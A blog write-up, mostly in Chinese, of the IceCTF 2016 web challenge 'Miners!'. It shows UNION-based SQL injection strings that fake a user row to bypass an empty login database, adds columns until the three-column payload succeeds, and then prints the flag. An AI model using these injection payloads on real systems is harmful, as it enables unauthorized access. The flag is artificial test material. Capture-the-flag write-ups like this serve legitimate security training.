Press "Enter" to skip to content

[IceCTF2016]Miners! – 65pt

Question:

The miners website has been working on adding a loginportal

so that all miners can get the flag, but they haven't madeany

accounts! However, your boss demands the flag now! Can you getin

anyway? miners.vuln.icec.tf

Solution:

這個網頁是一個登入頁面 , 而且提供了源代碼

{IceCTF2016}[Web](Stage2)Miners! - 65pt

本來只是一條普通的sql injection題目 ,

可是題目中說明了他們的database中沒有任何的record

所以我們只能自己偽造一條row出來了

在源碼中可以看見 , database中至少會有2個column , 分別是username和password,

所以得出以下sql query

blacktr' and 1=0 UNION SELECT 'blacktr','blacktr'

--

但是還是登入失敗了 , 所以開始要猜有多少個column , 慢慢加上去

blacktr' and 1=0 UNION SELECT'blacktr','blacktr','blacktr'

--

很好運氣 , 成功了

{IceCTF2016}[Web](Stage2)Miners! - 65pt

IceCTF{the_miners_union_is_a_strong_one}

Comments